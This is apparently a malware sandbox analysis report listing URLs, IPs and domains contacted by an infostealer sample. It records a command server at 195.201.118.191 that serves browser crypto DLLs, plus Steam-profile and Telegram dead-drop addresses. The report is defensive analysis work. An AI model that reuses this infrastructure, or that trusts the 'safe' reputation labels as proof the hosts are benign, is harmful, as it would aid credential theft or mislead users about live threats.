https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://store.steampowered.c	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
https://195.201.118.191/mozglue.dllTh	0%	Avira URL Cloud	safe
https://195.201.118.191/:	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://195.201.118.191/nss3.dllZh	0%	Avira URL Cloud	safe
https://www.autoitscript.com/autoit3/	0%	Avira URL Cloud	safe
https://195.201.118.191/:	0%	Virustotal		Browse
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://steamcommunity.com/profiles/76561199751190313T	0%	Avira URL Cloud	safe
https://www.autoitscript.com/autoit3/	0%	Virustotal		Browse
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://195.201.118.191/softokn3.dll	0%	Avira URL Cloud	safe
https://195.201.118.191/	0%	Avira URL Cloud	safe
https://195.201.118.191/mozglue.dll	0%	Avira URL Cloud	safe
https://steamcommunity.com/EII2991376MIL15JM9WCEETK	0%	Avira URL Cloud	safe
https://195.201.118.191/softokn3.dll	0%	Virustotal		Browse
https://steamcommunity.com/?subsection=broadcasts	0%	Virustotal		Browse
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
https://195.201.118.191/	0%	Virustotal		Browse
http://arpdabl.zapto.HJKJ	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199751190313	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199751190313/badges	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199751190313T	0%	Virustotal		Browse
https://steamcommunity.com/profiles/76561199751190313	2%	Virustotal		Browse
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=R0Sr	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
https://t.me/pech0nkhellosqlr.dllsqlite3.dllIn	0%	Avira URL Cloud	safe
https://195.201.118.191	0%	Avira URL Cloud	safe
https://195.201.118.191/mozglue.dll	0%	Virustotal		Browse
https://195.201.118.191/freebl3.dll	0%	Avira URL Cloud	safe
http://www.mozilla.com/en-US/blocklist/	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://195.201.118.191	0%	Virustotal		Browse
https://195.201.118.191/sqlr.dll	0%	Avira URL Cloud	safe
http://arpdabl.DAAAKFHJKJ	0%	Avira URL Cloud	safe
https://t.me/pech0nk	0%	Avira URL Cloud	safe
https://195.201.118.191/freebl3.dll	0%	Virustotal		Browse
https://195.201.118.191/sqlr.dll	0%	Virustotal		Browse
http://arpdabl.zapto.org	0%	Avira URL Cloud	safe
https://t.me/pech0nkhellosqlr.dllsqlite3.dllIn	0%	Virustotal		Browse
https://steamcommunity.com/my/wishlist/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	23.210.122.61	true	true	0%, Virustotal, Browse	unknown
arpdabl.zapto.org	0.0.0.0	true	false	12%, Virustotal, Browse	unknown
VBSJYFEwZnGfeqPJmZz.VBSJYFEwZnGfeqPJmZz	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://195.201.118.191/softokn3.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://195.201.118.191/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://195.201.118.191/mozglue.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199751190313	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://195.201.118.191/freebl3.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://195.201.118.191/sqlr.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	CBGCAF.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://store.steampowered.c	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	CBGCAF.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://195.201.118.191GI	Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.118.191/mozglue.dllTh	Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	Predicted.pif, 00000012.00000002.4067199541.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A4C000.00000004.00000800.00020000.00000000.sdmp, HDAAAA.18.dr	false	URL Reputation: safe	unknown
https://195.201.118.191/:	Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://www.autoitscript.com/autoit3/	Predicted.pif.9.dr, Determined.8.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://195.201.118.191/nss3.dllZh	Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	Predicted.pif, 00000012.00000002.4068055987.0000000004BA7000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199751190313T	Predicted.pif, 00000012.00000002.4066261893.000000000178A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	HDAAAA.18.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/EII2991376MIL15JM9WCEETK	Predicted.pif, 00000012.00000002.4066469500.0000000001878000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	Predicted.pif, 00000012.00000002.4067199541.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A4C000.00000004.00000800.00020000.00000000.sdmp, HDAAAA.18.dr	false	Avira URL Cloud: safe	unknown
http://arpdabl.zapto.HJKJ	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	Predicted.pif, 00000012.00000000.2370851757.00000000002C9000.00000002.00000001.01000000.0000000B.sdmp, Predicted.pif.9.dr, Determined.8.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	Predicted.pif, 00000012.00000002.4100831968.000000006C04D000.00000002.00000001.01000000.0000000D.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://mozilla.org0/	Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199751190313/badges	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://store.steampowered.com/privacy_agreement/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=R0Sr	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	CBGCAF.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	Predicted.pif, 00000012.00000002.4067199541.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A4C000.00000004.00000800.00020000.00000000.sdmp, HDAAAA.18.dr	false	Avira URL Cloud: safe	unknown
https://t.me/pech0nkhellosqlr.dllsqlite3.dllIn	Predicted.pif, 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4068055987.0000000004BA7000.00000040.00001000.00020000.00000000.sdmp, EHJDGC.18.dr	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	seo.exe, 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmp, seo.exe, 00000008.00000000.2344064575.0000000000408000.00000002.00000001.01000000.0000000A.sdmp, seo[1].exe.7.dr, seo.exe.7.dr	false	URL Reputation: safe	unknown
https://195.201.118.191	76561199751190313[1].htm.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	CBGCAF.18.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	CFHIIE.18.dr	false	URL Reputation: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
http://arpdabl.DAAAKFHJKJ	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/pech0nk	Predicted.pif, 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://arpdabl.zapto.org	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	EHJDGC.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	CFHIIE.18.dr	false	URL Reputation: safe	unknown
https://195.201.118.191/vcruntime140.dllR	Predicted.pif, 00000012.00000002.4067088704.00000000019EC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5iTMW1V3HmVR&a	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/market/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://store.steampowered.com/news/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
http://arpdabl.zaptoFHJKJ	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.118.191/vcruntime140.dllB	Predicted.pif, 00000012.00000002.4067088704.00000000019EC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	CBGCAF.18.dr	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Predicted.pif, 00000012.00000002.4068055987.0000000004BA7000.00000040.00001000.00020000.00000000.sdmp, EHJDGC.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
http://arpdabl.zapto	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/discussions/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	Avira URL Cloud: safe	unknown
